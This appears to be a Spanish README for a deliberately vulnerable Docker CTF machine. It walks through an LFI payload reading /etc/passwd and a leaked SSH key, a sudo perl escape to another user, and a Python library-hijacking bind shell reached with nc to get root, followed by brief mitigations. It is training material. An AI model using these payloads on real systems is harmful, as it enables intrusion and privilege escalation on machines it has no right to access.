# 🐳 CTF Docker – Escalada de Privilegios (Nivel Medio)

> Máquina Docker vulnerable para practicar **pentesting** y **escalada de privilegios**. Incluye web vulnerable, robo de credenciales, abuso de `sudo` y **Python library hijacking** hasta **root**.

---

## 📌 Datos generales

* **Nombre de la máquina:** `paw-ctf`
* **Dificultad:** Media
* **Objetivo final:** Obtener **root**
* **Tipo:** Docker (bridge por defecto)

---

## 👤 Usuarios (RENOMBRADOS)

| Usuario    | Rol           | Notas                             |
| ---------- | ------------- | --------------------------------- |
| `webuser`  | Web / SSH     | Usuario inicial tras credenciales |
| `operator` | Intermedio    | Permisos `sudo` parciales         |
| `root`     | Administrador | Objetivo final                    |

---

## 🌐 Servicios

* **HTTP**: 80 (Web vulnerable)
* **SSH**: 22 (login con clave)

---

## 🧭 Ruta de ataque (desde cero)

### 1️⃣ Enumeración

```bash
nmap -p- --open -sS --min-rate 5000 -n -Pn <IP>
```

Servicios detectados: **80, 22**

---

### 2️⃣ Web – LFI

La web permite cargar archivos vía parámetro vulnerable:

```
http://<IP>/index.php?secret=../../../../etc/passwd
```

📌 Pista: el parámetro `secret` no valida rutas.

---

### 3️⃣ Robo de credenciales

Mediante LFI se expone una clave privada:

```
/var/www/html/backup/id_rsa
```

Guardar y ajustar permisos:

```bash
chmod 600 id_rsa
```

Acceso SSH:

```bash
ssh -i id_rsa webuser@<IP>
```

---

### 4️⃣ Enumeración local

```bash
sudo -l
```

Resultado:

```
(operator) NOPASSWD: /usr/bin/perl
```

---

### 5️⃣ Escalada a `operator`

```bash
sudo -u operator perl -e 'exec "/bin/bash";'
```

---

### 6️⃣ Sudo peligroso (root)

```bash
sudo -l
```

Salida:

```
(root) NOPASSWD: /usr/bin/python3 /opt/paw.py
```

📌 `/opt` es **escribible**.

---

### 7️⃣ Python Library Hijacking

Crear payload **bind shell**:

```bash
cat << 'EOF' > /opt/subprocess.py
import socket,os
s=socket.socket()
s.bind(("0.0.0.0",4444))
s.listen(1)
conn,_=s.accept()
[os.dup2(conn.fileno(),fd) for fd in (0,1,2)]
os.system("/bin/sh")
EOF
```

Ejecutar como root:

```bash
sudo -u root /usr/bin/python3 /opt/paw.py
```

---

### 8️⃣ Acceso ROOT

Desde Kali/host:

```bash
nc <IP> 4444
```

Verificación:

```bash
whoami
id
```

🎉 **ROOT OBTENIDO**

---

## 🛡️ Mitigaciones (Blue Team)

* Validar parámetros web (anti-LFI)
* Quitar `NOPASSWD` en sudo
* `secure_path` en sudo
* No permitir escritura en `/opt`
* Imports Python con rutas absolutas

---

## 🐳 Notas para Docker

* Usar `bridge` por defecto
* Exponer **solo 80 y 22**
* El bind shell evita problemas de routing

---

## 📦 Entrega

Incluye:

* `Dockerfile`
* `docker-compose.yml`
* `README.md` (este archivo)

Ideal para **práctica, CTFs y formación**.

---

👨‍💻 Autor: **Sjd**
